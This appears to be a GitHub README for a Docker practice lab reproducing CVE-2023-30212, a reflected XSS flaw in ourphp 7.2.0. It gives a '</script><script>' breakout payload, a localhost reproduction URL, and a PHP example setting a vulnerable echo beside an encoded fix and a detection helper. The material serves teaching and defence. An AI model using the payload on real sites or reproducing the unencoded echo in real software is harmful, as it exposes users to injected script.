
This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.


Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE


CVE-2023-30212 POC : Cross-Site Scripting via /client/manage/ourphp_out.php

Products Affected By CVE-2023-30212 :

Vendor   Product   Version
ourphp   ourphp    7.2.0

Docker Installation Guide :

To install OURPHP <= 7.2.0 in Docker for practice purposes, follow the Docker installation guide included in this repository.

Explanation of the Vulnerability:

# ourphp 7.2.0 is vulnerable to XSS (Cross-Site Scripting).
# The file /client/manage/ourphp_out.php echoes a request-controlled variable directly into the response. When the ourphp_admin parameter is set to "logout", the value of the "out" parameter is echoed without any encoding, so whoever controls "out" can inject script into the page.
# The payload first closes the open script tag with </script> and then opens a new one. The vulnerability is triggered through the "out" parameter with the following payload: "</script><script>alert(xss)</script>"
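The following is an added example, not ourphp's own code: a minimal reconstruction of the pattern described above (the "out" parameter echoed unencoded inside a script block on logout) next to a hardened version that encodes the value for a JavaScript context, plus a small helper that counts script blocks so the effect of each version can be checked. Function names are hypothetical, and the assumption that the echo lands inside a script block follows from the leading </script> in the payload.

```php
<?php
// Vulnerable pattern (reconstruction, not the real ourphp_out.php): the raw
// request value is concatenated into a <script> block, so a value starting
// with "</script>" terminates the block and opens a new, attacker-written one.
function render_logout_vulnerable(array $get): string
{
    if (($get['ourphp_admin'] ?? '') !== 'logout') {
        return '';
    }
    $out = $get['out'] ?? '';
    return "<script>var out = '" . $out . "';</script>";
}

// Hardened pattern: json_encode with JSON_HEX_TAG turns "<" and ">" into
// \u003C and \u003E, so "</script>" can never appear in the emitted markup;
// JSON_HEX_QUOT and JSON_HEX_APOS also block quote-based breakouts. The value
// is additionally clamped to a short length, since a logout message has no
// business carrying arbitrary markup. An allow-list of known values is better still.
function render_logout_hardened(array $get): string
{
    if (($get['ourphp_admin'] ?? '') !== 'logout') {
        return '';
    }
    $out = substr((string) ($get['out'] ?? ''), 0, 64);
    $js  = json_encode($out, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return "<script>var out = " . $js . ";</script>";
}

// If the value were rendered in the HTML body instead of a script block,
// HTML-entity encoding is the right context-specific fix.
function render_logout_html_body(string $out): string
{
    return '<p>' . htmlspecialchars($out, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Detection helper: the breakout produces a second <script> block in the output.
function script_block_count(string $html): int
{
    return (int) preg_match_all('#<script\b#i', $html);
}

// Constructed request mirroring the payload from the page.
$request = ['ourphp_admin' => 'logout', 'out' => '</script><script>alert(`xss`)</script>'];
echo script_block_count(render_logout_vulnerable($request)), "\n"; // 2: injected block present
echo script_block_count(render_logout_hardened($request)), "\n";   // 1: only the page's own block
```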

Steps to Reproduce the issue:

# After completing the Docker setup, access the following path:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

Payload for the Vulnerability:

# </script><script>alert(`xss`)</script>

Video

CVE-2023-30212

References

  1. NIST (NVD entry for CVE-2023-30212)
  2. cve.mitre.org
  3. Ourphp 7.2.0 source code, for reference
